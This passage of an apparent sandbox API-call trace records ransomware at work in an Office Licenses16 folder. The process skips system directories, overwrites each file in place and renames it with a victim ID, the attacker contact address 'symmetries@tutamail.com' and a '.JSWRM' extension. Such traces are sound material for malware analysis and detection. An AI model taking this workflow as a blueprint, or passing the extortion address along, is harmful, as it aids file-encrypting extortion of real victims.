nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0109.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.293] CloseHandle (hObject=0x45c) returned 1 [0109.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0109.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0109.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0109.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0109.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0109.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0109.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.295] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0109.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0109.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0109.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0109.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0109.296] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea805c87, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea805c87, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea9833ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Trial-pl.xrm-ms", cAlternateFileName="PRED14~1.XRM")) returned 1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2=".") returned 1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="..") returned 1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="...") returned 1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="windows") returned -1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="recovery") returned -1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.296] lstrcmpiW (lpString1="ProPlusR_Trial-pl.xrm-ms", lpString2="msocache") returned 1 [0109.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0109.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0109.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240fe8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0109.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0109.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0109.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241010, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0109.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0109.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0109.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0109.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.360] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11147) returned 1 [0109.360] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0109.361] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0109.363] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.363] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0109.363] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.363] CloseHandle (hObject=0x45c) returned 1 [0109.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0109.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0109.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0109.364] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0109.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0109.364] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.364] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0109.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0109.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0109.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0109.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0109.366] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea793584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea793584, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea8c47e1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f67, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Trial-ppd.xrm-ms", cAlternateFileName="PR0B50~1.XRM")) returned 1 [0109.366] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0109.366] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0109.366] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0109.367] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0109.367] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.367] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.367] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.367] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.367] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.367] lstrcmpiW (lpString1="ProPlusR_Trial-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0109.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0109.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0109.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0109.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f20, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0109.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0109.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0109.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0109.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.368] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24423) returned 1 [0109.368] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f60) returned 0x24c1d0 [0109.368] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f60, lpOverlapped=0x0) returned 1 [0109.371] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.371] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f60, lpOverlapped=0x0) returned 1 [0109.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.371] CloseHandle (hObject=0x45c) returned 1 [0109.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0109.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0109.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0109.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0109.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0109.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0109.372] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.372] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0109.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0109.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0109.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0109.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0109.373] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea76d2b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea76d2b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea87839d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_Trial-ul-oob.xrm-ms", cAlternateFileName="PR5093~1.XRM")) returned 1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.373] lstrcmpiW (lpString1="ProPlusR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0109.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0109.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2413d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0109.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0109.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0109.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0109.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0109.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.374] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0109.374] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 